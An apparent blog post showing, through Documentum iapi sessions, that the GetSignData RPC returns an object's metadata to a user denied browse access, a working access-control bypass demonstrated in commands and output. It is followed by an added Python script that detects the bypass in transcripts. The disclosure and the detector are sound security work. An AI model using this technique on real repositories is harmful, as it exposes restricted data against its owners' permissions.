Extra “protection” with trusted content services :)

Just to continue the theme of the usefulness of the TCS option, mentioned in "Some ideas about organising storage for content files".

The GetSignData RPC command is intended to verify the digital signature of dm_audittrail objects:

API> retrieve,c,dm_audittrail
...
5f024be980000100
API> get,c,l,_sign_data
...
<audit-record>
<dctm-attr name="r_object_id" type="ID"><![CDATA[5f024be980000100]]></dctm-attr>
<dctm-attr name="event_name" type="STRING"><![CDATA[dm_logon_failure]]></dctm-attr>
<dctm-attr name="event_source" type="STRING"><![CDATA[System Unspecific]]></dctm-attr>
<dctm-attr name="r_gen_source" type="INT"><![CDATA[1]]></dctm-attr>
<dctm-attr name="user_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="audited_obj_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="time_stamp" type="TIME"><![CDATA[2015-05-05 15:24:19]]></dctm-attr>
<dctm-attr name="string_1" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="string_2" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="string_3" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="string_4" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="string_5" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="id_1" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_2" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_3" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_4" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_5" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="chronicle_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="object_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="version_label" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="object_type" type="STRING"><![CDATA[dm_user]]></dctm-attr>
<dctm-attr name="event_description" type="STRING"><![CDATA[Logon Failure]]></dctm-attr>
<dctm-attr name="policy_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="current_state" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="workflow_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="session_id" type="ID"><![CDATA[01024be980000123]]></dctm-attr>
<dctm-attr name="user_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="owner_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="acl_name" type="STRING"><![CDATA[dm_45024be98000021f]]></dctm-attr>
<dctm-attr name="acl_domain" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="application_code" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="controlling_app" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="audit_version" type="INT"><![CDATA[4]]></dctm-attr>
<dctm-attr name="host_name" type="STRING"><![CDATA[docu72dev01]]></dctm-attr>
<dctm-attr name="time_stamp_utc" type="TIME"><![CDATA[2015-05-05 12:24:19]]></dctm-attr>
<dctm-attr name="i_audited_obj_class" type="INT"><![CDATA[2]]></dctm-attr>
<dctm-attr name="registry_id" type="ID"><![CDATA[26024be980000100]]></dctm-attr>
<dctm-attr name="audited_obj_vstamp" type="INT"><![CDATA[1]]></dctm-attr>
<dctm-attr name="attribute_list_old" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list_aspect_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
</audit-record>

In real life it may be used to retrieve the metadata of any object in the repository, regardless of its security settings:

API> create,c,dm_document
...
09024be980526275
API> grant,c,l,dm_world,AccessPermit,,1
...
OK
API> save,c,l
...
OK
API> connect,DCTM_DEV,test_user,test_user
...
s1
API> fetch,c,09024be980526275
...
[DM_API_E_EXIST]error:  "Document/object specified by 09024be980526275 does not exist."

[DM_SYSOBJECT_E_NO_BROWSE_ACCESS]error:  "No browse access for sysobject with ID '09024be980526275'."


API> apply,c,09024be980526275,GetSignData
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : <audit-record>
<dctm-attr name="r_object_id" type="ID"><![CDATA[09024be980526275]]></dctm-attr>
<dctm-attr name="object_name" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="r_object_type" type="STRING"><![CDATA[dm_document]]></dctm-attr>
<dctm-attr name="title" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="subject" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="authors" type="STRING" repeating="true" index="0"><![CDATA[]]></dctm-attr>
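
A regression check for the behaviour shown above, as an added example that is not part of the original post: it scans a captured iapi transcript and reports object IDs whose fetch was refused with DM_SYSOBJECT_E_NO_BROWSE_ACCESS but whose attributes still came back in an audit-record. The function names and the abbreviated sample transcript are constructed for illustration.

```python
import re

# One <dctm-attr> element as printed by _sign_data / GetSignData.
ATTR_RE = re.compile(r'<dctm-attr name="([^"]+)" type="[^"]+"([^>]*)>'
                     r'<!\[CDATA\[(.*?)\]\]></dctm-attr>', re.S)
DENIED_RE = re.compile(
    r"\[DM_SYSOBJECT_E_NO_BROWSE_ACCESS\].*?ID '([0-9a-f]{16})'")

def parse_audit_records(text):
    """One dict per <audit-record>; tolerates output cut off before the closing tag."""
    records = []
    for chunk in text.split("<audit-record>")[1:]:
        rec = {}
        for name, extra, value in ATTR_RE.findall(chunk.split("</audit-record>")[0]):
            if 'repeating="true"' in extra:
                rec.setdefault(name, []).append(value)
            else:
                rec[name] = value
        records.append(rec)
    return records

def acl_bypass_findings(transcript):
    """Map each ID refused with NO_BROWSE_ACCESS to the attribute names still returned."""
    denied = set(DENIED_RE.findall(transcript))
    return {rec["r_object_id"]: sorted(k for k in rec if k != "r_object_id")
            for rec in parse_audit_records(transcript)
            if rec.get("r_object_id") in denied}

# Constructed sample: the session from the post, abbreviated.
SAMPLE = """\
API> fetch,c,09024be980526275
...
[DM_SYSOBJECT_E_NO_BROWSE_ACCESS]error:  "No browse access for sysobject with ID '09024be980526275'."
API> apply,c,09024be980526275,GetSignData
...
API> dump,c,q0
  result                          : <audit-record>
<dctm-attr name="r_object_id" type="ID"><![CDATA[09024be980526275]]></dctm-attr>
<dctm-attr name="object_name" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="r_object_type" type="STRING"><![CDATA[dm_document]]></dctm-attr>
<dctm-attr name="title" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="subject" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="authors" type="STRING" repeating="true" index="0"><![CDATA[]]></dctm-attr>
"""

if __name__ == "__main__":
    for obj_id, attrs in acl_bypass_findings(SAMPLE).items():
        print(f"{obj_id}: readable despite denied browse access -> {attrs}")
```

An empty result for a transcript recorded as a user without browse access means the RPC no longer returns attributes for objects that user cannot see.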
